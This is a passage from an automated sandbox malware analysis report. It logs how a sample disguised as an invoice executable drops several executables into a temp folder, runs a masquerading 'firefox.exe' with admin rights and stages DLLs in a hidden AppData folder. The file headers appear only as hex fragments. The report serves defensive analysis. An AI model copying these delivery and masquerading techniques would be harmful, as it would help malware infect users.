unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 06 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 106 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp
unknown 28864 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 2e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................@.....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp
unknown 25792 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 f5 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!....."...................@.....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 107 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 da 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!...............................................
success or wait 2 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp
unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 108 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp
unknown 22720 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cf 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp
unknown 24256 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ea 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 1c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 109 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp
unknown 24256 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 da 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 1c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp
unknown 20672 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 110 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp
unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 11 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp
unknown 11 4c 4f 4c 5f 44 4c 4c 2e 64 6c 6c
LOL_DLL.dll success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d4 23 89 84 90 42 e7 d7 90 42 e7 d7 90 42 e7 d7 99 3a 74 d7 9e 42 e7 d7 0e e2 20 d7 91 42 e7 d7 ab 1c e4 d6 96 42 e7 d7 ab 1c e3 d6 9d 42 e7 d7 ab 1c e6 d6 94 42 e7 d7 ab 1c e2 d6 8f 42 e7 d7 fd 1f e6 d6 94 42 e7 d7 05 1c e6 d6 93 42 e7 d7 90 42 e6 d7 b1 43 e7 d7 05 1c e9 d6 e3 42 e7 d7 05 1c e7 d6 91 42 e7 d7 02 1c 18 d7 91 42 e7 d7 05 1c e5 d6 91 42 e7 d7 52 69 63 68 90 42 e7
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B...:t..B.... ..B.......B.......B.......B.......B.......B.......B...B...C.......B.......B.......B.......B..Rich.B.
success or wait 9 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 111 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp
unknown 22117 ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 08 07 06 0a 08 08 08 0b 0a 0a 0b 0e 18 10 0e 0d 0d 0e 1d 15 16 11 18 23 1f 25 24 22 1f 22 21 26 2b 37 2f 26 29 34 29 21 22 30 41 31 34 39 3b 3e 3e 3e 25 2e 44 49 43 3c 48 37 3d 3e 3b ff db 00 43 01 0a 0b 0b 0e 0d 0e 1c 10 10 1c 3b 28 22 28 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b 3b ff c0 00 11 08 01 59 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
......JFIF.............C......
.....................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......Y...."............................................................}........!1A..Qa."q.2....
success or wait 1 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 00 00 01 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 18 00 0e 00 00 00 b4 01 00 00 02 00 00 60 10 00 00 00 10 00 00 00 20 00 00 00 00 e0 6e 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 73 ac 02 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 48 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ........ [email protected]......... .........................H..
success or wait 2 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 112 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de ac ff e9 9a cd 91 ba 9a cd 91 ba 9a cd 91 ba 93 b5 02 ba 8a cd 91 ba 04 6d 56 ba 98 cd 91 ba a1 93 92 bb 94 cd 91 ba a1 93 95 bb 91 cd 91 ba a1 93 90 bb 9e cd 91 ba a1 93 94 bb 95 cd 91 ba f7 90 90 bb 93 cd 91 ba 9a cd 90 ba 29 cd 91 ba 0f 93 9f bb 89 cd 91 ba 0f 93 91 bb 9b cd 91 ba 08 93 6e ba 9b cd 91 ba 0f 93 93 bb 9b cd 91 ba 52 69 63 68 9a cd 91 ba 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................mV.................................................).....................n.............Rich...........
success or wait 3 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a bf 9e eb 0e de f0 b8 0e de f0 b8 0e de f0 b8 d3 21 3b b8 0c de f0 b8 07 a6 63 b8 16 de f0 b8 35 80 f1 b9 0d de f0 b8 0e de f1 b8 b1 de f0 b8 35 80 f3 b9 07 de f0 b8 35 80 f4 b9 02 de f0 b8 35 80 f5 b9 18 de f0 b8 35 80 f8 b9 76 de f0 b8 35 80 f0 b9 0f de f0 b8 35 80 0f b8 0f de f0 b8 35 80 f2 b9 0f de f0 b8 52 69 63 68 0e de f0 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J................!;.......c.....5...............5.......5.......5.......5...v...5.......5.......5.......Rich...................
success or wait 7 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 113 of 149
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 8c 5f 27 3c ed 31 74 3c ed 31 74 3c ed 31 74 3c ed 30 74 8e ed 31 74 c0 9a 88 74 3f ed 31 74 cd 2b ff 74 d7 ec 31 74 cd 2b fc 74 5d ed 31 74 cd 2b e2 74 0b ed 31 74 cd 2b fe 74 84 ed 31 74 cd 2b fb 74 3d ed 31 74 cd 2b f8 74 3d ed 31 74 cd 2b fd 74 3d ed 31 74 52 69 63 68 3c ed 31 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8e 85 98 50 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x._'<.1t<.1t<.1t<.0t..1t...t?.1t.+.t..1t.+.t].1t.+.t..1t.+.t..1t.+.t=.1t.+.t=.1t.+.t=.1tRich<.1t................PE..L......P...
success or wait 14 4AACAC WriteFile
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 90 60 9b 4d d4 01 f5 1e d4 01 f5 1e d4 01 f5 1e dd 79 66 1e e7 01 f5 1e d4 01 f4 1e 5a 01 f5 1e f3 c7 8b 1e d5 01 f5 1e b9 5c f1 1f c7 01 f5 1e b9 5c f5 1f d5 01 f5 1e b9 5c f6 1f 8a 01 f5 1e b9 5c f0 1f 82 01 f5 1e b9 5c fb 1f b7 03 f5 1e b9 5c 0a 1e d5 01 f5 1e b9 5c f7 1f d5 01 f5 1e 52 69 63 68 d4 01 f5 1e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fc 94 99 57 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .M.............yf.........Z............\.......\.......\.......\.......\.......\.......\......Rich............PE..L......W...
success or wait 14 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 114 of 149
Registry ActivitiesRegistry Activities
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp
unknown 65536 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 c7 c3 9a 27 a6 ad c9 27 a6 ad c9 27 a6 ad c9 fa 59 66 c9 25 a6 ad c9 2e de 3e c9 2c a6 ad c9 27 a6 ac c9 0f a6 ad c9 1c f8 a9 c8 37 a6 ad c9 1c f8 ae c8 34 a6 ad c9 1c f8 a8 c8 23 a6 ad c9 1c f8 a5 c8 3f a6 ad c9 1c f8 ad c8 26 a6 ad c9 1c f8 52 c9 26 a6 ad c9 1c f8 af c8 26 a6 ad c9 52 69 63 68 27 a6 ad c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'....Yf.%.....>.,...'...........7.......4.......#.......?.......&.....R.&.......&...Rich'...................PE..L..
success or wait 2 4AACAC WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
C:\Users\user\Desktop\facture_1398665.exe unknown 64 success or wait 1 4AABDC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 1 4AABDC ReadFile
C:\Users\user\Desktop\facture_1398665.exe unknown 1 success or wait 25 4AABDC ReadFile
Key Path Completion CountSourceAddress Symbol
Key Path Name Type Data Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 14:49:23
Start date: 07/05/2018
Path: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Wow64 process (32bit): false
Commandline: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Imagebase: 0x1350000
File size: 531408 bytes
MD5 hash: 52FFABA4273678BAE75442F2BC85B470
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File ReadFile Read
Analysis Process: firefox.exe PID: 3844 Parent PID: 3824Analysis Process: firefox.exe PID: 3844 Parent PID: 3824
General
Copyright Joe Security LLC 2018 Page 115 of 149
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
success or wait 1 2E34A4 CreateDirectoryA
C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize
normal directory file and synchronous io non alert and open for backup ident and open reparse point
object name collision 1 2E2F63 CreateDirectoryA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
sequential only and synchronous io non alert and non directory file
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll
read data or list directory and read attributes and delete and synchronize and generic write
archive and not contend indexed
